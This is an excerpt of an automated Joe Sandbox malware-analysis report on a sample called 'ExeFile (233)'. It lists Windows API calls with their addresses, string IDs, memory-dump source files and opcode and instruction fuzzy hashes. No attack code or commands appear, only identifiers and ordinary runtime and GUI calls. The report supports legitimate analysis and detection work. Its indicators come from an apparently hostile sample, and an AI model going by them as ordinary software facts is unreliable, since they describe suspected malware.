                                                                  • Opcode Fuzzy Hash: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction Fuzzy Hash: 2BF0F871A407489BD730BB729D09B47BAE1FFC4B10F02092EE2818BA90E6B6E0419F44
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Version$MessageRegisterWindow
                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                  • API String ID: 303823969-2485103130
                                                                  • Opcode ID: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction ID: cf2be246d5d97fda33aa8db455070e9bef683d48ca9bcd61a13d8190e2691888
                                                                  • Opcode Fuzzy Hash: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction Fuzzy Hash: 38E0803AA0D13546D7116764BE4476B66A45B54361FD6007BC90143764976C0C878A7E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(mscoree.dll,0040F0D9,?,00431AC0,00000008,0040F110,?,00000001,00000000,00412FBC,00000003), ref: 0040EF70
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF80
                                                                  • ExitProcess.KERNEL32 ref: 0040EF94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                  • String ID: CorExitProcess$`#vp,$v$mscoree.dll
                                                                  • API String ID: 75539706-2710989135
                                                                  • Opcode ID: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction ID: 941fb14b8e6e74046c3674dea832eee8b0a2cfa7b7099c50836eeb20d6140e2c
                                                                  • Opcode Fuzzy Hash: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction Fuzzy Hash: 0FD0C730705301BFD7106B63DC0DF1A3A58AE44B05B485D357446D01B0CF74C851E52D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C230
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C292
                                                                  • VariantClear.OLEAUT32(00000007), ref: 0040C5C0
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C735
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                    • Part of subcall function 00408A64: SystemTimeToVariantTime.OLEAUT32(?), ref: 00408AB2
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C715
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                  • String ID:
                                                                  • API String ID: 2075586698-0
                                                                  • Opcode ID: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction ID: 6ab10ce611a99a1f8f361261b98790ac6c7d0aa24a7c23b9a0ac30f561102aa8
                                                                  • Opcode Fuzzy Hash: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction Fuzzy Hash: BCE12B7580011CEACF15EB94C991AFEBB79BF18304F0441ABF845B32D1EB385A49DB69
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,004322C4,00000001,?,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 004155F2
                                                                  • GetLastError.KERNEL32 ref: 00415604
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 00415666
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0040FE1B,?,00000000), ref: 004156E4
                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004156F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3581945363-0
                                                                  • Opcode ID: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction ID: a1f57d75a495807adbd5f9f81b07e7c36f1fa25e7f2b40525a61db36998abfa5
                                                                  • Opcode Fuzzy Hash: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction Fuzzy Hash: CC41E231900A15EBCF219F51DC46EEF7B75FF88760F14052AF814A6290D7388991DBE8
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C758
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C80A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C88B
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C89A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C8A9
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0040C8BE
                                                                    • Part of subcall function 0040C22B: __EH_prolog.LIBCMT ref: 0040C230
                                                                    • Part of subcall function 0040C22B: VariantClear.OLEAUT32(?), ref: 0040C292
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                  • String ID:
                                                                  • API String ID: 3098219910-0
                                                                  • Opcode ID: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction ID: 36662450c5e1947f06e528152222194ba2e0adfdc782b58db195a1114ff86cd1
                                                                  • Opcode Fuzzy Hash: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction Fuzzy Hash: 33512AB1A00209DFDB24DFA4C884BEEB7B8FF44305F10462EE516E7291D778A945CB68
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00426F0B
                                                                  • GetParent.USER32(?), ref: 00426F19
                                                                  • GetParent.USER32(?), ref: 00426F2C
                                                                  • GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                  • IsWindowEnabled.USER32(?), ref: 00426F50
                                                                  • EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 670545878-0
                                                                  • Opcode ID: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction ID: 07f23732e05c0ddae676fdba191ad6f2f3c3259ccd052a946048ec3c933e7ffc
                                                                  • Opcode Fuzzy Hash: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction Fuzzy Hash: 0411063230823157CE316A5A7E40B2BB29C5F68B50FC7002BED10D3304EB28CC0246DD
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 004266CA
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004266DE
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004266EC
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004266FE
                                                                  • PtInRect.USER32(?,?,?), ref: 0042670E
                                                                  • GetWindow.USER32(?,00000005), ref: 0042671B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                  • String ID:
                                                                  • API String ID: 1315500227-0
                                                                  • Opcode ID: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction ID: 83608b20ab5d7acfc5f4007f6359faa5a2816e21795921f9c93a6bd5c83018c8
                                                                  • Opcode Fuzzy Hash: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction Fuzzy Hash: 2F018F35300125ABDB21AF56AC08EAF3B68AF44751F810026F91193190DB34D9028BA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-2386870291
                                                                  • Opcode ID: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction ID: e63f41d058283e0c0eb0ae7a93c28366d44745800656fe3e600f804c74b5ca7e
                                                                  • Opcode Fuzzy Hash: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction Fuzzy Hash: E2312971904701EADB249F36AD45BDB37A4DF95314F24447BF909E2282FB7C8981839D
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00421F77
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F89
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F9A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00421FB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID: (
                                                                  • API String ID: 2178440468-3887548279
                                                                  • Opcode ID: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction ID: 4f815d2d5e0452abf6b21b186733e73ea544739a7e03d6a9e74580ef656ef9a0
                                                                  • Opcode Fuzzy Hash: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction Fuzzy Hash: 063105353003249FCB20AF6AE984A6FB7B4BF14314F95052EF552977A1DB39E805CB98
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041FFB6
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0041FFD5
                                                                  • IsWindowEnabled.USER32(00000000), ref: 0041FFE0
                                                                  • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0041FFF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledItemLongMessageSend
                                                                  • String ID: Edit
                                                                  • API String ID: 3499652902-554135844
                                                                  • Opcode ID: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction ID: 3fda86f08f798bfc712dbe9114479d5ed61c9c1c5043182bfc70c8b50dcb543f
                                                                  • Opcode Fuzzy Hash: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction Fuzzy Hash: EF01C830300221AAFA302A26BC05B9BB7966F11759F94443BF402D12A2CBE9DCC6C55C
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00432A70,00000010,004107C0,00000000,00000FA0,76230A60,00000000,00411F62,0040E8F2,?,00431A70,00000060), ref: 00416AD3
                                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00416AE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: InitializeCriticalSectionAndSpinCount$`#vp,$v$kernel32.dll
                                                                  • API String ID: 1646373207-1530109648
                                                                  • Opcode ID: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction ID: ce44358daea0c9ea577a3d839c8de632687c57e94c437d53c63a589a871009e4
                                                                  • Opcode Fuzzy Hash: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction Fuzzy Hash: 86F05430740302EFDB28AFA5DD05B8E36A4AF45394F64D17BA412E26A0D7BCD9849A1D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00410526), ref: 004169FB
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00416A0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32$`#vp,$v
                                                                  • API String ID: 1646373207-3967587774
                                                                  • Opcode ID: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction ID: f7e75c8983afe75b452e8c5a0e3795a3a9e97458d4fb11f8d1bffce13407fbee
                                                                  • Opcode Fuzzy Hash: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction Fuzzy Hash: BCC01270350300AAE9606B622D19F56218C6F18B83F1904667503F01A0CB68C081653D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B2F8
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0042B323
                                                                  • VariantClear.OLEAUT32(0000000C), ref: 0042B47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariantlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2416264355-0
                                                                  • Opcode ID: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction ID: 2154954aee45bc9f37d5e476858aa3f54607d5b4520b193f721ce322dcdb1a24
                                                                  • Opcode Fuzzy Hash: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction Fuzzy Hash: 9381D471A01629EBCF10DF55E881AAEBBB0FF05358F90851AF854AB251C738D991CBD8
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0040E699,?), ref: 004122AB
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 00412329
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 0041238E
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 004123B2
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 00412412
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlocked$QueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2947987494-0
                                                                  • Opcode ID: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction ID: d666452b32fb370f5039d9c4d9c953f1fa938a618f22207ba933b66a0757dcd5
                                                                  • Opcode Fuzzy Hash: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction Fuzzy Hash: 8F511530A006158FCB288F28DB817EA73A5BB49314F64957BD851C72A1E3FCDCE2864D
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00412BE6
                                                                  • GetFileType.KERNEL32(?), ref: 00412C90
                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 00412D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleInfoStartupType
                                                                  • String ID:
                                                                  • API String ID: 2461013171-0
                                                                  • Opcode ID: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction ID: d278a9e66e7a289658028d0007e01ec58958c44d3a53fc808e972aab8f93b423
                                                                  • Opcode Fuzzy Hash: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction Fuzzy Hash: 6A512A702047418FD7208F68DD847A677E4FB12328F24863ED696CB2E1E7B8D4A6C749
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction ID: cd14ed6faf968c26f5ad3f682f5955487037b3cb07160dd73ebcc5381cbba43c
                                                                  • Opcode Fuzzy Hash: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction Fuzzy Hash: 3341F3B1D00225AACF30BFA69C848AFBA74EB55728710453FFD15B66D1D33C4D898A9C
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040483B
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00404847
                                                                  • LockResource.KERNEL32(00000000), ref: 0040485C
                                                                  • FreeResource.KERNEL32(00000000), ref: 0040488F
                                                                  • GetDlgItem.USER32(?,00000000), ref: 00404939
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeItemLoadLock
                                                                  • String ID:
